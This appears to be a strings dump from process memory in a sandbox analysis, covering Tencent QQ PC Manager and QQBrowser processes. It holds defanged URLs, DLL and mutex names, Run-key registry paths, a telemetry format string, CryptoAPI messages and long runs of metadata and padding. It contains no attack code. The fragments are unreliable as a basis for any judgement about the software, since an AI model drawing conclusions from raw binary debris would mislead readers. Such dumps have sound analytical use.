.?AVRegKey@Util@@
.?AVQBUrlMon@@
.?AUIQBUrlMon@@
.DRNO
%uGK*
miTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987" xmpMM:DocumentID="xmp.did:6ACE31686BC811E4BB15FCCD96C86E83" xmpMM:InstanceID="xmp.iid:6ACE31676BC811E4BB15FCCD96C86E83" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:84c4a418-a2af-ac43-bba5-1b1f8cf90df6" stRef:documentID="xmp.did:723F865B7DD411E398088F4193AAC80D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
qiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987" xmpMM:DocumentID="xmp.did:2E71AB3E408811E38A5696E6BC700E31" xmpMM:InstanceID="xmp.iid:2E71AB3D408811E38A5696E6BC700E31" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:27b90230-111d-124b-9db6-845f45fabf66" stRef:documentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Eh
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987" xmpMM:DocumentID="xmp.did:2EA2096C408811E38A5696E6BC700E31" xmpMM:InstanceID="xmp.iid:2EA2096B408811E38A5696E6BC700E31" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:27b90230-111d-124b-9db6-845f45fabf66" stRef:documentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987" xmpMM:DocumentID="xmp.did:2EBEB8EB408811E38A5696E6BC700E31" xmpMM:InstanceID="xmp.iid:2EBEB8EA408811E38A5696E6BC700E31" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:27b90230-111d-124b-9db6-845f45fabf66" stRef:documentID="xmp.did:5b0e3b1f-ec38-4845-9a7f-3f8dee307987"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
fiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:95E8E7044661E311A3C7A711B1A9056B" xmpMM:DocumentID="xmp.did:A10B63AE621311E3B9538CAD594C7E52" xmpMM:InstanceID="xmp.iid:A10B63AD621311E3B9538CAD594C7E52" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7BF53A6D0A62E311B10BED7EAD5B78AD" stRef:documentID="xmp.did:95E8E7044661E311A3C7A711B1A9056B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:95E8E7044661E311A3C7A711B1A9056B" xmpMM:DocumentID="xmp.did:A10B63B2621311E3B9538CAD594C7E52" xmpMM:InstanceID="xmp.iid:A10B63B1621311E3B9538CAD594C7E52" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7BF53A6D0A62E311B10BED7EAD5B78AD" stRef:documentID="xmp.did:95E8E7044661E311A3C7A711B1A9056B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:95E8E7044661E311A3C7A711B1A9056B" xmpMM:DocumentID="xmp.did:A11F886F621311E3B9538CAD594C7E52" xmpMM:InstanceID="xmp.iid:A11F886E621311E3B9538CAD594C7E52" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7BF53A6D0A62E311B10BED7EAD5B78AD" stRef:documentID="xmp.did:95E8E7044661E311A3C7A711B1A9056B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:EB1C7874EB5A11E1B87CAEEF31C517A2" xmpMM:DocumentID="xmp.did:EB1C7875EB5A11E1B87CAEEF31C517A2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EB1C7872EB5A11E1B87CAEEF31C517A2" stRef:documentID="xmp.did:EB1C7873EB5A11E1B87CAEEF31C517A2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
!Y.yo
=W.jF
6V6A#,%X
Y;%se
.RdB0
o?f%D
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a8735661-322a-bc41-bfe1-c29d76b10700" xmpMM:DocumentID="xmp.did:C93DC7E0FD0811E3A28DE218C2CB462C" xmpMM:InstanceID="xmp.iid:C93DC7DFFD0811E3A28DE218C2CB462C" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:56446da9-bfb7-dd4c-96ea-c2eb0fb4a1ea" stRef:documentID="xmp.did:a8735661-322a-bc41-bfe1-c29d76b10700"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>6
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:a8735661-322a-bc41-bfe1-c29d76b10700" xmpMM:DocumentID="xmp.did:C93DC7E4FD0811E3A28DE218C2CB462C" xmpMM:InstanceID="xmp.iid:C93DC7E3FD0811E3A28DE218C2CB462C" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:56446da9-bfb7-dd4c-96ea-c2eb0fb4a1ea" stRef:documentID="xmp.did:a8735661-322a-bc41-bfe1-c29d76b10700"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><asmv3:application><asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings"><dpiAware>true</dpiAware></asmv3:windowsSettings></asmv3:application></assembly>
0-1D1}1
9”9D9d9
.04080<0@0
9#9'9 9/9
4%5s8`9
2-2Z2}2
? ?$?(?,?0?4?
5 5$5(5,5
7 7<7@7\7`7
> >$>(>,>0>4>8><>@>
Comctl32.dll
k{"Cmd": %d, "GUID": "%s", "UIN": "%s", "CVer": "%s", "CSoftID": %d, "TriggerMode": %d, "COS": "%s", "SupplyID": "%s", "COSLan": %d, "bPatch": %d }
"%s" "%s" "%s" "%s"
desc.txt
/S /handle=%u /installmode=%d
-key=%d -value=%d -type=%d
\F1Assistant.dll
{3C6D43EA-1F61-4b46-90C4-1AA48B9C887E}
QB_5E407EF8-E1A4-4520-927B-1657800B77FE
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\
?456789:;<=
!"#$%&'()* ,-./0123
https
Advapi32.dll
Wintrust.dll
Crypt32.dll
\urlmon.dll
\wininet.dll
%d.%d.%d
kernel32.dll
Resource.dll
%appdata%\Tencent\QQBrowser\HomePage\0\website\index.html|*|
ehXXp://VVV.5334.com|*|5334
HotKey
FirstStartUrl
EducationUrl
ActivityUrl
autologin_uin
%s\%u\
Software\Tencent\QQBrowser\HotKey
Window-C3B5614F-FC04-4344-A5EE-EA343DBCC9A3
qqbrowser://html/quickaccess/index.html
QBHttpDownloaderWnd
advapi32.dll
Kernel32.dll
User32.dll
\Global.db
Chrome
windows
Windows7
iphlpapi.dll
o\\.\PhysicalDrive%d
\\.\Scsi%d:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %d.%d) QQBrowser/6.0
%s:%d
HTTP/1.0
HTTP/1.1
~!@#$&*()=:/;? '
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp\QQBrowserLiveup.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) QQBrowser/6.0
2014-07-16 00:00:00
9.3.7078.400
QQBrowserLiveup.exe

QQPCRTP.exe_2840:




.text
`.rdata
@.data
.rsrc
@.reloc
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMService\QMRtpSvc.cpp
masterconn11.qq.com
CRTPServer::SetConfigChangeEvent Receive Config Change Message!
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMService\RTPServer.cpp
CRTPServer::OnConfigChanged Begin Unload Plugins!
CRTPServer::OnConfigChanged Begin Load Plugins!
RtpPerfLog: StartTray: CReportManager::GetInstance().Initialize() bRet = %d
RtpPerfLog: CRTPServer StartSystemModules begin
RtpPerfLog: CRTPServer StartSystemModules end
RtpPerfLog: StartTray: CReportManager::GetInstance().Report() bRet = %d
CRTPServer::Delay_ReportTrayStartInfor
CRTPServer::MainWorkThread_PostQuitMsg
CRTPServer::MainWorkThread_ConfigChange
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTHardware\QMPublicExe\QMService\Service.cpp
RtpPerfLog: entering Handler(%d)
RtpPerfLog: leaving Handler(%d)
Init start value %d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonFromStart :bSucc:%d Id:%d Session:%d module:%s
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMFramework\Core\PluginManager.cpp
UnloadPlugins: Name :%ws, UnloadTime: %d
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
CreateIReportClient
ReleaseIReportClient
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMReportMgr\QMReportMgr.cpp
InitCommonData, ProductID=%d, ClientVersion=%I64d
QMEnumLoginQQ
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\QQPCRTP.pdb
VERSION.dll
WS2_32.dll
GetProcessHeap
KERNEL32.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjectsEx
USER32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegFlushKey
RegEnumKeyExW
RegNotifyChangeKeyValue
RegGetKeySecurity
RegSetKeySecurity
RegQueryInfoKeyW
ADVAPI32.dll
PSAPI.DLL
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
WTSAPI32.dll
SHLWAPI.dll
USERENV.dll
QQPCRTP.exe
.?AV?$RunnableMethod@P8CRTPServer@@AEHXZUTuple0@@@?$ScopedRunnableMethodFactory@VCRTPServer@@@qmbase@@
.?AV?$RunnableMethod@P8CRTPServer@@AEXXZUTuple0@@@?$ScopedRunnableMethodFactory@VCRTPServer@@@qmbase@@
.?AV?$CQMIpcRequestHandle@VCRTPServer@@@IPC@@
.?AV?$ScopedRunnableMethodFactory@VCRTPServer@@@qmbase@@
.?AV?$CSingleton@VCRTPServer@@@QMUtils@@
.?AVCRTPServer@@
.?AVCQMIpcPipe@IPC@@
.PA_W
.?AV?$CSingleton@VCReportManager@QMReportMgr@@@utils@@
.?AVCReportManager@QMReportMgr@@
5.17499.219\QQPCRTP.exe
77777777777
()))....
89(95((0
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
; <,<;<^<
0)030]0{0
3-424@4`4
:";5;:;\;};
< <$<(<,<0<4<8<<< ?$?(?,?
< ?<?@?\?`?
explorer.exe
bugreport.exe
bugreport /buginfo:%p:%p:%p:%lu
\StringFileInfo\xx\FileDescription
\StringFileInfo\xx\FileVersion
\StringFileInfo\xx\ProductName
QQFileFlt.dll
\\.\Global\%s
\\.\%s
QQPCMgr.exe
"{0}\{1}"
QQPCRtp
\Imm32.dll
\ptrate.dll
QQPCRTP
Global\{9F07EDA1-EF07-47e7-A7EE-59069A1247DD}
QQPCTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
SOFTWARE\Microsoft\Windows\CurrentVersion
QMHips.dll
QMHipsEngine.dll
!QMRtpCheck.dll
%s\%s
\QMDns.dll
..\scc.dll
..\TAVEng.dll
QMSafeboxPlugin.dll
..\QQPCHardware.dll
..\QMFileMon.dll
..\TAVCache.dll
..\QMUl.dll
QMRepairPlugin.dll
QQPCNetFlow.exe
Global\com.tencent.qqpcmgr.sysoptimize.single.mutex
QQPCSysOptimize.exe
Global\{8C0CCCAE-1B9C-4c93-96BC-F8DE034FB952}
sqlite.dll
QMTrayPlugin\QMPerfCtrl\QMPerf.dll
eGlobal\TAV_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
SYSTEM\CurrentControlSet\services\QQPCRTP
{04CE0CB6-CDF3-4a4b-8B9D-292A455FAF5B}
"{0}\{1}"
{E11173AE-6007-4a43-811E-6069470B72E6}
{84B48DA1-935E-457d-9566-68C2222F9609}
QQPCMgrUpdate.exe
"{0}\{1}{2}" {3}
QQPCTAVSrv.exe
QQPCUpdateAVLib.exe
QQPCClinic.exe
QMSafeShut.exe
ntdll.dll
EXPLORER.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
QQPCLeakScan.exe
"{0}\{1}" {2} {3}
\RefuseInject.dll
AperfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}
Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}
Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}
QMIpc.dll
@QMWebFW.DLL
RtpPerfLog: before loading %s
RtpPerfLog: after loading %s
RtpPerfLog: before init %s
RtpPerfLog: after init %s
SendLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}, Reason: Service disabled
PostLoopbackMessage FAILED, MSGID:{0}
/{0}/{1}/{2}
SendIpcMessage Begin, MSGID:{0}, TARGET:{1}
SendIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
PostIpcMessage FAILED, MSGID:{0}, TARGET:{1}, Reason: Service disabled
/%d/%d/%d
PipeServer::ReleaseTunnel()
0 is an invalid value for completionKey
Pipe Broken
CIOCompletionPort::PostStatus() - PostQueuedCompletionStatus
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
QQQuickLoginInfo
QQLoginInfo
Failed to call RtlGetVersion(), err=%d, RtlGetVersion=%p
Windows version: %d.%d.%d (sp %d)
okernel32.dll
dr.dll
%u.%u.%u.%u
11.5.17490.219
QMCommon.dll
Load QMCommon.dll failed, path=%S
11,5,17490,219

QQPCTray.exe_3088:




.text
`.rdata
@.data
.rsrc
@.reloc
L$ QSShP
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMCommonlib\QMCommon.cpp
Get function "%s" address failed.
Init start value %d
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\FTCommon\QMCommonLibDll\QMPerfMon\QMPerfMon.cpp
InsertPerfMonItem: [error] start value %d
InitPerfMon [ok]: module:%s
InitPerfMon [error]: module:%s
PerfMonDuring bSucc:%d Id:%d Session:%d module:%s
QQLogin
(%d.%d) d:d:d.d %s_%s:d(K): %s
(%d) d:d:d.d %s_%s: %s
(M) d:d:d.d ||
D:\jenkins_Trunk\workspace\11.5Patch_SourceJob\qqpcmgr_proj\Basic\Output\BinFinal\QQPCTray.pdb
SHLWAPI.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
.17499.219\QQPCTray.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="QQPCMgr" processorArchitecture="X86" type="win32" version="1.0.0.0"></assemblyIdentity><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.ATL" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
>$>*>3>=>~>
3 7$7(7,707
3 3$3<3@3`3
Global\{88B0D764-B5C3-4c4a-958F-B76524517744}
Global\{00B0D764-B5C4-414a-458F-993573939483}
\ptrate.dll
QMMain.dll
QQPCMgr.rdb
QQPCCommonMgr.rdb
\RefuseInject.dll
sAppLaunch.%d.prf
AppLaunch.prf
Num of Files:%d
Num of Sec:%d, File:%s
Rec d info size:%d
AppPrefLog.log
QMCommon.dll
Load QMCommon.dll failed, path=%S
QQPCMgr.exe
QQPCTray.exe
QQPCRTP.exe
perfLogConf.ini
Global\{A4F31C01-A8C8-40ba-BC77-7E8BF6049F58}
Global\{388F581B-10BF-4918-8A80-565FDC0D6D2D}
Global\{2FF8DD38-1192-4fde-BCDA-C20DB962F403}
Global\{17ED6DA0-0902-461c-B763-F00FF209066B}
Global\{FA6FBBB1-8C8E-43b1-B8EC-35573A94C231}
ErrLogFile.log
C:\ErrLogFile.log
11.5.17490.219
11,5,17490,219

QQPCTray.exe_3088_rwx_0023C000_00001000:




keysvc

QQPCTray.exe_3088_rwx_02F67000_00001000:




RSA Signature Key
RSA KeyExchange Key
Using your private exchange key to decrypt
Signing data with your private exchange key
Creating a new RSA signature key
Creating a new RSA exchange key
DSS Signature Key
DH KeyExchange Key
Creating a new DSS signature key
Creating a new Diffie-Hellman exchange key
Using your Diffie-Hellman exchange key to create an agreed key
Migrating keys to new storage
Deleting your private signature key
Deleting your private exchange key
Deleting your old private signature key for migration purposes
Deleting your old private exchange key for migration purposes
Signing data with your private signature key
Exporting your private exchange key
Exporting your private signature key
Importing a new private exchange key
Importing a new private signature key
CryptoAPI Private Key

qmdl.exe_5168:




.text
`.rdata
@.data
.rsrc
@.reloc
QPSSh
RVSSh,
